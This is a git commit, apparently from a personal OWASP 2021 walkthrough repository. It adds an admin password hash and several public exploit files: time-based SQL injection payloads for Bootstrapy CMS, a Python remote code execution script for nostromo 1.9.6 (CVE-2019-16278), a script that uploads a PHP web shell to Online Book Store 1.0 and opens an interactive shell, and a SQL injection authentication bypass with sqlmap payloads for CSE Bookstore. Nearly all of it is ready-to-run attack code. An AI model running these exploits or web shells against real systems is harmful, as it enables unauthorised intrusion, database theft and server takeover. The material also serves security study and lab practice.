initial commit

Walkthroughs/OWASP2021/crypto-failure/admin.hash

@@ -0,0 +1 @@
+6eea9b7ef19179a06954edd0f6c05ceb

Walkthroughs/OWASP2021/vuln-and-outdated/46590

@@ -0,0 +1,36 @@
+# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
+# Date: 21.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: http://bootstrapy.com
+# Demo Site: http://bootstrapy.net/demo/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/forum-thread.php
+Vulnerable Parameter: thread_id (POST)
+Attack Patten:
+search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/modules/pages/contact-submit.php
+Vulnerable Parameter: subject (POST)
+Attack Pattern:
+email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
+
+----- PoC 3 - SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
+Vulnerable Parameter: post-id
+Attack Pattern:
+body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1
+
+----- PoC 4 - SQLi -----
+
+Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
+Vulnerable Parameter: thread-id (POST)
+Attack Pattern:
+quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z

Walkthroughs/OWASP2021/vuln-and-outdated/47837

@@ -0,0 +1,70 @@
+# Exploit Title: nostromo 1.9.6 - Remote Code Execution
+# Date: 2019-12-31
+# Exploit Author: Kr0ff
+# Vendor Homepage:
+# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
+# Version: 1.9.6
+# Tested on: Debian
+# CVE : CVE-2019-16278
+
+#cve2019_16278.py
+
+#!/usr/bin/env python
+
+import sys
+import socket
+
+art = """
+
+                                        _____-2019-16278
+        _____  _______    ______   _____\    \   
+   _____\    \_\      |  |      | /    / |    |  
+  /     /|     ||     /  /     /|/    /  /___/|  
+ /     / /____/||\    \  \    |/|    |__ |___|/  
+|     | |____|/ \ \    \ |    | |       \        
+|     |  _____   \|     \|    | |     __/ __     
+|\     \|\    \   |\         /| |\    \  /  \    
+| \_____\|    |   | \_______/ | | \____\/    |   
+| |     /____/|    \ |     | /  | |    |____/|   
+ \|_____|    ||     \|_____|/    \|____|   | |   
+        |____|/                        |___|/    
+
+
+
+"""
+
+help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
+
+def connect(soc):
+    response = ""
+    try:
+        while True:
+            connection = soc.recv(1024)
+            if len(connection) == 0:
+                break
+            response += connection
+    except:
+        pass
+    return response
+
+def cve(target, port, cmd):
+    soc = socket.socket()
+    soc.connect((target, int(port)))
+    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
+    soc.send(payload)
+    receive = connect(soc)
+    print(receive)
+
+if __name__ == "__main__":
+
+    print(art)
+    
+    try:
+        target = sys.argv[1]
+        port = sys.argv[2]
+        cmd = sys.argv[3]
+
+        cve(target, port, cmd)
+   
+    except IndexError:
+        print(help_menu)

Walkthroughs/OWASP2021/vuln-and-outdated/47887

@@ -0,0 +1,47 @@
+# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-01-07
+# Exploit Author: Tib3rius
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+import argparse
+import random
+import requests
+import string
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', action='store', help='The URL of the target.')
+args = parser.parse_args()
+
+url = args.url.rstrip('/')
+random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
+
+payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
+
+file = {'image': (random_file + '.php', payload, 'text/php')}
+print('> Attempting to upload PHP web shell...')
+r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
+print('> Verifying shell upload...')
+r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
+
+if random_file in r.text:
+    print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
+    print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
+    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
+    if launch_shell.lower() == 'y':
+        while True:
+            cmd = str(input('RCE $ '))
+            if cmd == 'exit':
+                sys.exit(0)
+            r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
+            print(r.text)
+else:
+    if r.status_code == 200:
+        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
+    else:
+        print('> Web shell failed to upload! The web server may not have write permissions.')

Walkthroughs/OWASP2021/vuln-and-outdated/48960

@@ -0,0 +1,33 @@
+# Exploit Title: CSE Bookstore Authentication Bypass
+# Date: 27/10/2020
+# Exploit Author: Alper Basaran
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10 Enterprise 1909
+
+
+CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel. 
+By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.
+
+Payload: 
+Name: admin
+Pass: %' or '1'='1 
+
+Sample BurpSuite intercept:
+
+POST /bookstore/admin_verify.php HTTP/1.1
+Host: 192.168.20.131
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+Origin: http://192.168.20.131
+Connection: close
+Referer: http://192.168.20.131/bookstore/admin.php
+Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv
+Upgrade-Insecure-Requests: 1
+
+name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query

Walkthroughs/OWASP2021/vuln-and-outdated/49314

@@ -0,0 +1,110 @@
+# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
+# Date      : 2020-12-21
+# Author    : Musyoka Ian
+# Version   : CSE Bookstore 1.0
+# Vendor Homepage: https://projectworlds.in/
+# Platform  : PHP
+# Tested on : Debian
+
+CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability  will lead to an attacker dumping the entire database the web appliction is running on
+
+Below is results returned by  SQLMap 
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138#                                                                                                                                                                    Type: error-based
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
+
+
+POC 1 
+
+REQUEST
+========
+GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
+Host: 192.168.196.83
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
+Upgrade-Insecure-Requests: 1
+
+RESPONSE
+========
+
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:09:49 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 172
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
+
+POC 2
+Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
+
+REQUEST
+=======
+
+POST /ebook/cart.php HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
+
+
+bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
+
+RESPONSE
+=======
+get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
+
+POC 3.
+Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
+
+REQUEST
+=======
+GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/books.php
+Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
+
+RESPONSE
+========
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:47:58 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 188
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1